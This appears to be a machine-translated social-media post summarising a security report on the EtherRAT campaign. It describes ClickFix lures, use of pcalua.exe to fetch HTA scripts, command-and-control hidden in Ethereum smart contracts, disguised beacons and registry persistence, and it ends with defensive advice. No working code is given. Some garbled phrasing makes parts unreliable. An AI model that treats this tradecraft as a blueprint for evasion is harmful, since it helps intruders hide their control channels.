EtherRAT and EtherHiding Malware Campaign

EtherRAT and EtherHiding malware campaigns were found. Special techniques were used, hiding the infrastructure on Ethereum.

When it comes to Ethereum or ETH, many people may think of the most famous Krypto Kerrenzi coin, second only to Bitcoin, but the blockchain network of the Ethereum system can also strengthen the infrastructure of malware.

According to a report by the website Cyber Security News, a remote access Trojan malware distribution campaign called EtherRAT (source indicates that it is capable of system back-door or backdoor malware) was detected by a research team from eSentire, a company that develops an Endpoint Detection and Response tool that can detect the presence of this malware from a customer's system in March. After it was investigated, it was found to be associated with a group of hackers from North Korea who used it. Deceive victims into job interviews, and sometimes deceive victims as IT teams to handle system problems, leading to malware infiltrating the system.

In the area of deception to enter the victim machine, it can be called a variety. For example, the first is that after the hacker has managed to persuade the victim to trust the victim, the hacker will trick the victim into a fake link that will take the victim to the website, trick the victim into a fake error alert and trick the victim into running a download command, and install the malware on the machine, which will run the command via pcalua.exe, to pull Fetch an HTA script (HTML Application) of the malware into the machine, which is called ClickFix, and the other way is to deceive the victim through a program like Microsoft Team and log in. The victim passes through a tool like QuickAssist to enter the victim's machine without permission.

And more specifically, many malware is that this malware uses a way to hide its infrastructure on Ethereum's network with EtherHiding, a technique that introduces intelligent contract systems or Smart Contracts to help contact C2 or Command and Control with the malware to keep in touch at any time even if the victim tries to disconnect.

The operation of this technique is that after the malware is run, the malware sends requests to many public Ethereum RPC Providers to choose the most consistent ones to use as C2 server contacts. The hackers that manage the server will connect the server to this new address via setString. At the same time, all malware-infected machines will automatically contact the server address on this Ethereum network without requiring repeated malware on the server and to help them. It is even more difficult to detect. The malware will fake the transmission of data through the traffic channel as a normal CDN request. In addition, the Beacon URL itself is made the same as a static file request. The requested file genus does not have an anomaly. The file usually ends in the genus .ico, .png, or .css.

At times, malware can send source code to C2 server to request a new version of the original code to overwrite it. This also makes Signature-based Defense harder to detect. In addition to building the system's persistence, the malware has modified the Windows Registry in the Run Key with the addition of a Hexadecimal 12 characters at random to prevent repeated pattern detection. Pattern Detection, in which the malware runs itself through conhost.exe in Headless Mode.

For that protection, the research team advised users to disable mshta.exe and pcalua.exe via AppLocker or Windows Defender Application Control (WDAC) to prevent malware scripts from running on the machine.

# Trending # Lemon 8 Howtoo # lemon 8 diary # eth # freedomhack